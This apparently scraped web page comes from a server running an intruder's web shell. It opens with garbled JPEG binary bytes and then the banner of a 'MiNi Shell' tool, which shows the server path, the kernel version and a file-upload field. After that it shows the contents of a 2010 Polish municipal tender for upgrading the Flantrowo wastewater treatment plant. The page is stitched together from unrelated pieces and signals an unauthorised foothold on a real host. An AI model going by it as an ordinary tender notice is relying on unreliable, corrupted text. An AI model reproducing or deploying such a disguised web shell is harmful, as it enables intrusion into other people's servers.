JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100528/149014-N-2010.html

<p class="kh_header"><b>Janowiec Wielkopolski: Modernizacja i rozbudowa oczyszczalni ścieków we Flantrowie oraz wymiana urządzeń technologicznych w centralnej przepompowni ścieków w Janowcu Wielkopolskim</b><br>
<b>Numer ogłoszenia: 149014 - 2010; data zamieszczenia: 28.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Janowiec Wielkopolski , ul. Gnieźnieńska 3, 88-430 Janowiec Wielkopolski, woj. kujawsko-pomorskie, tel. 052 3023034, faks 052 3023020.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um-janowiecwlkp.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja i rozbudowa oczyszczalni ścieków we Flantrowie oraz wymiana urządzeń technologicznych w centralnej przepompowni ścieków w Janowcu Wielkopolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na kompleksowej  modernizacji i rozbudowie oczyszczalni ścieków we Flantrowie oraz wymiana urządzeń technologicznych w centralnej przepompowni ścieków w Janowcu Wielkopolskim.

Opis przedmiotu zamówienia:

  Modernizacja i rozbudowa oczyszczalni ścieków odbywać się będzie przy ciągłej i bieżącej eksploatacji. Roboty budowlane  należy realizować w  sposób umożliwiający pracę obecnego ciągu technologicznego. Zakres rzeczowy robót budowlanych określony jest w dokumentacji projektowej  oraz w  przedmiarach robót  dla  zakresu od 1 do 12  jak niżej:
								
Zakres 1/   BUDYNEK Z URZĄDZENIEM DO MECHANICZNEGO PODCZYSZCZANIA ŚCIEKÓW  ZSP-45 - projekt budowlany   - Tom  XII/5 
 
Budynek parterowy, niepodpiwniczony o konstrukcji stalowej szkieletowej, osłonięty blachą falistą (ściany i dach). Nieocieplany,  z opaską szerokości 0,50 m z kostki brukowej. 

Parametry techniczne obiektu: 

-powierzchnia zabudowy:     39,84m2
 -długość:         12,41m
 -szerokość:     3,21m
 -wysokość:      3,85m

Projektowany budynek przeznaczony będzie do zamontowania urządzeń do mechanicznego podczyszczania ścieków: ZSP-45.;

Zakres 2/  DROGI WEWNĘTRZNE NA TERENIE OCZYSZCZALNI - projekt budowlany  - Tom XX/5

Parametry techniczne obiektu: 

-powierzchnia nowej nawierzchni - 444,7m2
-powierzchnia poszerzenia istniejącej drogi - 78,2m2
-powierzchnia renowacji istniejącej nawierzchni wynosi - 2.432,90m2
-chodniki szerokości 1m ze spadkami poprzecznymi w kierunku terenów zielonych

Nawierzchnia jezdni placu : 
 	-  kostka betonowa h= 6 cm na podsypce cementowo-piaskowej  gr. 4cm

Nawierzchnia poszerzenia:
-warstwa ścieralna z betonu asfaltowego h=4cm
-warstwa wiążąca z betonu asfaltowego  h=4cm
-podbudowa z kruszywa łamanego stabilizowanego mechanicznie lub tłucznia kamiennego      h= 20cm
-podsypka piaskowa gr.10cm

Nawierzchnia renowacji istniejącej nawierzchni bitumicznej:
-warstwa ścieralna z betonu asfaltowego gr.4cm
-warstw profilowa z betonu asfaltowego o średniej grub. 3cm (w celu nadania spadków).;

Zakres 3/     KOMORY OSADU CZYNNEGO KOC-1   - projekt budowlany  - tom X/6

Komora osadu czynnego w postaci monolitycznego zbiornika żelbetowego z betonu B-30 W-8 F-200
Parametry techniczne obiektu: 

- powierzchnia zabudowy: 170,04 m 2 ;
- kubatura: 850,20 m3
- szerokość- 10,90m
- długość- 15,60m
- głębokość całkowita -5m.;


Zakres 4/  KOMORA POMIAROWA KP  -      projekt budowlany -  Tom VIII/5 

Komora pomiarowa - kołowy zbiornik żelbetowy z betonu B20, monolityczny, jednokomorowy, przykryty płytą żelbetową z włazem stalowym:

- ściany zewnętrzne: żelbetowe, monolityczne gr. 25 cm, zbrojone prętami śr. 12 ze stali 34 GS 

- płyta denna: kołowa, żelbetowa monolityczna gr 25 cm, zbrojona prętami śr. 12 ze stali 34 GS 

- płyta górna przykrywająca: żelbetowa, monolityczna o gr. 12 cm, zbrojona prętami śr. 12 ze stali A-III  34GS 

Parametry techniczne obiektu: 

- średnica zewnętrzna - 2,30m
- głębokość całkowita - 2,75m
- głębokość czynna 2,38 m
- pow. zabudowy 5,29 m2
- kubatura 14,55 m3.;

Zakres 5/     OSADNIK WTÓRNY OWT-1   O - 10,00m  - projekt budowlany - Tom XIV/5 

Osadnik wtórny - okrągły jednokomorowy , kołowy zbiornik żelbetowy, monolityczny, odkryty., częściowo zalegający w gruncie. Wewnątrz osadnika wykonana będzie rama komory osadowej a zewnątrz komora przelewowa. Górą zbiornik żelbetowy z betonu B-30

Parametry techniczne obiektu: 

- średnica zewnętrzna - 10,50m
- średnica wewnętrzna - 10,00m
- głębokość całkowita z komorą osadową - 4,26m
- powierzchnia zabudowy - 88,0 m2 z komorą przelewową
- kubatura - 398,10 m3.;

Zakres 6/   PRZEPOMPOWNIA OSADÓW  PO ZE STANOWISKIEM PRZYGOTOWANIA  PIX  - projekt budowlany Tom - IX/5

Przepompownia osadów PO - monolityczny zbiornik żelbetowy z betonu B-20, trójkomorowy z czterema włazami w płycie stropowej, w znacznej części zagłębiony. 

Parametry techniczne obiektu: 
- szerokość zew. - 3,85m
- długość zew. - 3,95m
- głębokość - 3,55m

Stanowisko przygotowania PIX stanowi wanna żelbetowa w której zostanie zamontowany zbiornik preparatu PIX.

Parametry techniczne wanny: 

- szerokość - 1,50m
- długość -    1,50m
- głębokość - 0,60m.;


Zakres 7/    STANOWISKO KRATY RĘCZNEJ - projekt budowlany - Tom V/5

Stanowisko kraty ręcznej stanowi odkryty zbiornik żelbetowy dwukomorowy (komora wytłumień, kanał ściekowy).Krata ręczna zostanie zamontowana w kanale ściekowym.
Wymiary płyty dennej ( w nawiasie wielkości kanału ściekowego):

Parametry techniczne  płyty dennej ( w nawiasie wielkości kanału ściekowego):

- szerokość - 2,10m    ( 0,90m)
- długość   - 2,10m      ( 2,20m)
- grubość  - 0,20m      ( 0,20m).;


Zakres 8/    ZAGĘSZCZACZ   GRAWITACYJNY - projekt budowlany - Tom XI/5

Zbiornik zagęszczacza grawitacyjnego stanowi zbiornik kołowy, żelbetowy, monolityczny jednokomorowy.

 Parametry techniczne  zbiornika:

- średnica zewnętrzna - 5,00m
- średnica wewnętrzna - 4,50m
- wysokość - 3,00m.;

Zakres 9/   SIECI TECHNOLOGICZNE NA TERENIE OCZYSZCZALNI - 
          
                   projekt budowlany -    sieci technologiczne - Tom II/6/C;
                                                 
          1.Przewody kanalizacji technologicznej:
   	    1)  ścieki podczyszczone mechanicznie;
   	    2) odpływ ścieków od KOC-2 do OWT-1;
   	    3) odpływ ścieków oczyszczonych z OWT-1 i OWT-2 do istniejącego kolektora 400mm;
   	    4 )przewód kanalizacyjny z osadnika OWT-2 i KOC-2;
   	    5) ścieki dowożone i przewód cyrkulacji osadu;
   	    6) kanalizacja z KOC-1 do KR i z ZSP-45 do istniejącego kolektora tłocznego;
   	    7) przewód osadu recyrkulowanego od PO do  komory rozdziału ścieków;
  	    8) odpływ ścieków oczyszczonych z OWT -2;
   	    9) odpływ osadów pływających;
  	  10) recyrkulacja osadów z komory KOC-1 z części A i B;
  	  11) recyrkulacja osadów z komory KOC-2;
  	  12) spust osadu z KSO-1 i KSO-2 na zagęszczacz grawitacyjny;
  	  13) kanalizacja osadów zagęszczonych do budynku prasy;
         2. Przewody sprężonego powietrza;
         3.  Przewód PIX;
         4.  Przewód wodociągowy;
         5. Przewody kanalizacji dla płyty kompostowej;
         6. Przewody kanalizacji deszczowej;
         7. Renowacja istniejącego rowu R-FO ( bez zmiany dna kanału- opis dokumentacji);
         8. Umocnienie stopy skarpy rz. Wełny.;


Zakres 10/   TECHNOLOGIA NA TERENIE OCZYSZCZALNI ORAZ CENTRALNA PRZEPOMPOWNIA  ŚCIEKÓW  

    - projekt budowlany:   technologia sanitarna - część opisowa - Tom II/1/A; 
           -   technologia sanitarna - część graficzna - Tom III
         - centralna przepompownia ściekowa - wymiana urządzeń technologicznych - Tom XXIII/5

1. Technologia 
1) Komora osadu czynnego KOC-1
 2) Osadnik wtórny OWT-1
 3) Osadnik wtórny OWT-2  ( pozycje od 46 do 73) - nie będzie realizowany, nie  należy  uwzględniać w kosztorysie ofertowym)
4)  Uśredniający zbiornik ścieków dowożonych
5) Komora stabilizacji osadów KSO  - 1
6)  Komora stabilizacji osadów KSO - 2
7)  Komora osadu czynnego KOC-2
            8)  Stanowisko kraty ręcznej
            9) Przepompownia osadów PO
          10) Pomiar ścieków na głównym odpływie
          11) Komora rozdziału ścieków
          12) Budynek z urządzeniem do podczyszczania ścieków
         13) Zagęszczacz grawitacyjny osadu D=4,5m
         14) Kontenerowa stacja zlewcza  STZ-201B
         15) Przepompownie nr.10 i 8           
         16) Sprzęt ochronny dla obsługi oczyszczalni i przepompowni ścieków
         17) Sprzęt do pomiaru i sterowania :

Wykonawca winien uwzględnić w realizacji zadania  wytyczne dla automatyki i układu sterowania oczyszczalni ścieków w tym:

Sterowanie pomp i mieszadeł :
Załączanie ręczne lub automatyczne. Sterowanie automatyczne musi mieć możliwość ustawienia czasu pracy i czasu postoju. Pompy muszą być zabezpieczone przed suchobiegiem. Możliwość wyboru pracy z dyspozytorni. Możliwość wyłączenia urządzenia w miejscu jego pracy.

Sterowanie napowietrzaniem: 
Sterowanie napowietrzaniem musi być realizowane w zależności od stężenia tlenu w komorach oczyszczania.
Do każdego KOC przypisane jest:
- tlenomierz 1szt./komorę
- przepustnica z napędem elektrycznym regulacyjnym 1szt./komorę

elementy wspólne:
-  3 zestawy dmuchaw  sterowane  falownikiem   
- rurociąg powietrzny rozgałęziony na każdą z komór zakończony przepustniacami z napędem   elektrycznym regulacyjnym
- tlenomierz do pomiaru - 2 kpl 

Sterowanie napowietrzaniem komór stabilizacji -(włącz-wyłącz) realizowane w sposób ciągły, bez sondy tlenowej. 

        18) Próby i rozruchy 

   2. Demontaże istniejących instalacji i urządzeń 
   3. Centralna przepompownia ścieków - wymiana urządzeń technologicznych.; 


Zakres 11/      KOMORA ROZDZIAŁU ŚCIEKÓW   - projekt budowlany -  Tom VI/5
       
 Komora rozdziału ścieków stanowi zbiornik żelbetowy o ścianach prefabrykowanych z kręgów żelbetowych zamontowanych na monolitycznej żelbetowej płycie fundamentowej.

Parametry techniczne  zbiornika:
                    - średnica kręgów zewnętrznych  : 210 cm                
                    - głębokość całkowita                   :  225 cm
                    - wymiary płyty dennej:                :  240x240x20 /cm/
                    - kubatura                                     : 7,80 m3.;


Zakres 12 /    ROBOTY ELEKTRYCZNE - projekt budowlany  -  Tom XIX/6

   Roboty elektryczne zgodnie z projektem budowlanym należy wykonać w poniższym zakresie:
1. Linie kablowe
2. Oświetlenie terenu
3. Rozdzielnie
4. Zbiornik uśredniający
5. Budynek sita 
6. Komora KOC-1
7. Komora stabilizacji KSO-1
8. Komora KOC-2
9.  Komora stabilizacji KSO-2
10. Stacja dmuchaw
11. Pompownia osadów
12. Stanowisko PIX
16. Podłączenie urządzeń i pomiary

 Uwaga!   W kosztorysach ofertowych dla robót elektrycznych nie należy uwzględniać  punktów:
             punkt  13 - wiata stalowa na maszyny pozycja kosztorysu 139 - 141 ;
             punkt 14 - wiata rozdrabniarki  - pozycja  kosztorysu 142-144 
             punkt 15  - wiata kompostowni -  pozycja kosztorysu 145-148 
  ponieważ nie będą realizowane w tym postępowaniu.;  

Zakres 13 /   System zdalnego sterowania dla trzynastu lokalnych  przepompowni ścieków

System zdalnego sterowania w każdej przepompowni musi monitorować:  
- poziom ścieku w pompowni
- praca i awaria pomp
- obecność napięcia zasilającego 
- liczniki godzin pracy
- licznik ilości załączeń pomp
- położenie przełączników wyboru pracy pomp

W celu zdalnego sterowania na każdej przepompowni musi być zainstalowany poniższy zestaw urządzeń  do zmonitorowania przepompowni ścieków za pomocą GPRS : standard
- sonda hydrostatyczna   
- sterownik   
- modem GPRS 
- zasilacz akumulatorowy 
- montaż i okablowanie 

Ponadto na terenie oczyszczalni w celu zebrania sygnałów i sterowania pracą poszczególnych przepompowni z terenu oczyszczalni muszą być zainstalowane n/w urządzenia:

- licencja oprogramowania SCADA 
- zestaw komputerowy z drukarką, monitorem, UPS, narzędzia, oprogramowanie systemowe , wizualizacja  

Zestaw komputerowy do sterowania przepompowni musi być kompatybilny ze systemem sterowania pracą urządzeń oczyszczalni ścieków.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
3) Przedmiot zamówienia  opisany jest  szczegółowo w poniższych dokumentach:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
Załącznik nr 1 -  dokumentacja  budowlano-wykonawcza pn. Rozbudowa i modernizacja  istniejącej oczyszczalni ścieków - poszczególne tomy  dla zakresu od 1 do 12 
                   oraz w dokumentacji ogólnej tj: 
                   -   projekt budowlany:  Architektura - tom I/4
                   -   projekt budowlany:  Komora stabilizacji osadów - tom XIII-5
                   -   projekt budowlany: Modernizacja komory osadu czynnego  KOC-2 - tom XVI/5
                   -   dokumentacja geotechniczna - tom XXIV/1, 
                   -   instrukcja technologiczna i eksploatacyjna - tom XXI/4/A , 
                   -   instrukcje do oczyszczalni ścieków  - tom XXI/5/B 
                   -    operat wodnoprawny - tom XXII/6     
                          Pozwolenie na budowę Starosty Żnińskiego nr UA.-3-7351/82/2004 z 21.07.2004 r.; 
                                     
      Załącznik nr 2 - specyfikacja techniczna wykonania i odbioru robót  - 
   
       Ogólne specyfikacje techniczne i Szczegółowe specyfikacje techniczne wykonania i odbioru robót.;        
                         
     Załącznik nr 3  - przedmiary  robót: zakres od 1 do 12

- które stanowią załącznik do niniejszej specyfikacji oraz są dostępne na stronie internetowej zamawiającego  jako załącznik do specyfikacji.

Z uwagi na to, że w dokumentacji budowlano-wykonawczej pewne  urządzenia i materiały oznaczone są za pomocą znaków towarowych lub pochodzenia należy założyć, że każdemu temu oznaczeniu towarzyszą wyrazy  lub równoważny to znaczy o parametrach, cechach, wartościach technicznych, wartościach estetycznych nie gorszy niż określony w projekcie, gwarantujących realizację robót zgodnie z projektem budowlanym oraz wydanym pozwoleniem na budowę. Równoważne produkty i urządzenia muszą posiadać wszelkie wymagane prawem certyfikaty, atesty, świadectwa  dopuszczające je do obrotu i stosowania. Obowiązek udowodnienia równoważności ciąży na Wykonawcy. Wykaz zastosowanych i przyjętych przez Wykonawcę do wyceny materiałów lub urządzeń równoważnych musi zostać załączony do oferty, Wszelkie nazwy własne urządzeń i materiałów użyte w dokumentacji określają minimalne oczekiwane parametry jakościowe, techniczne oraz wymagany standard..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.23.13.00-8, 45.31.10.00-0, 45.23.32.26-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1 WYkonawca zobowiązany jest przed upływem terminu składania ofert tj. nie później niż do dnia 

16 czerwca 2010 r. do godz. 10.00

do wniesienia wadium w wysokości  50.000,00 zł ( słownie: pięćdziesiąt tysięcy złotych 00/100)

2 Wadium może być wniesione w jednej lub kilku następujących formach:
 	  - pieniądzu;
 -  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
 	- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158 z późn. zm.).;

3. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ta musi być sporządzona zgodnie z obowiązującym prawem i winna zawierać  w szczególności następujące elementy:
      1) nazwę dającego zlecenie, beneficjenta gwarancji (Zamawiającego);
     2)    kwotę gwarancji;
      3)   termin ważności;
      4) zobowiązanie gwaranta do  zapłaty kwoty gwarancji na pierwsze pisemne żądania  zamawiającego gdy wykonawca:
          - odmówił podpisania umowy na warunkach określonych w ofercie lub nie wniósł zabezpieczenia należytego wykonania umowy,
          -  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy,  
          -  na wezwanie o którym mowa w art. 26 ust. 3 ustawy pzp wykonawca nie złożył dokumentów lub oświadczeń, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn niezależnych od wykonawcy;

4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego tj. 

                      Pałucki Bank Spółdzielczy w Wągrowcu Oddział Janowiec Wlkp.                                     Nr 56 8959 0001 5500 0198 2000 0040

z podaniem tytułu:  wadium do zamówienia  pn. Modernizacja i rozbudowa oczyszczalni ścieków we Flantrowie -     nr sprawy IN.341-8/10.

5. Termin wniesienia wadium:

5.1  wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu przelewem , Zamawiający będzie uważał za skutecznie wniesione tylko wówczas, gdy bank prowadzący rachunek zamawiającego potwierdzi przelew pieniędzy  przed upływem terminu składania ofert. Do oferty należy dołączyć kopię polecenia przelewu.

5.2   wadium wnoszone w innych dopuszczonych przez zamawiającego formach  niż pieniądzu należy złożyć w  oryginale w osobnej kopercie wraz z ofertą oraz kopii dołączonej do oferty.
6. W sprawach związanych z wadium i jego zwrotem mają zastosowanie przepisy art. 46 ustawy prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią formularza nr 2 do SIWZ -  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną  ( potwierdzoną  dokumentami, że roboty te zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone)  odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. Zamawiający za roboty spełniające ten warunek uzna roboty wykonane  w zakresie budowy,  przebudowy, rozbudowy oczyszczalni ścieków o przepustowości nie mniejszej niż 1500 m3/dobę.

 Ocena spełniania warunku zostanie dokonana na podstawie przedłożonych przez wykonawcę dokumentów o których mowa w rozdziale 6 punkt 6.5.1 specyfikacji - na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią formularza nr 2 do SIWZ -  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane obowiązującymi przepisami uprawnienia do kierowania robotami budowlanymi oraz aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa w tym:

         1)  kierownik budowy - min. 1 osoba-  posiadająca  doświadczenie zawodowe co najmniej 5 lat  w pełnieniu funkcji  kierownika budowy i  legitymujący się uprawnieniami  do kierowania robotami budowanymi bez ograniczeń   w specjalności konstrukcyjno-budowlanej;  

       2)  kierownik robót - min. 1 osoba, posiadająca  doświadczenie zawodowe co najmniej 5 lat  w pełnieniu funkcji  kierownika budowy- robót  i  legitymujący się uprawnieniami  do kierowania robotami budowanymi   w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  gazowych, wodociągowych i kanalizacyjnych;

  3) kierownik robót - min. 1 osoba,  posiadająca doświadczenie zawodowe co najmniej 5 lat  w pełnieniu funkcji  kierownika budowy - robót  i  legitymujący się uprawnieniami  do kierowania robotami budowanymi  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 

            - wymaganymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2006 r. Nr  156 poz. 1118 z późn. zm. ). 
         
         Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
   
Ocena spełniania warunku zostanie dokonana na podstawie przedłożonych przez wykonawcę dokumentów o których mowa w rozdziale 6  punkt 6.5.2 i 6.5.3 SIWZ    - na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez wykonawcę zgodnie z treścią formularza nr 2 do SIWZ -  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
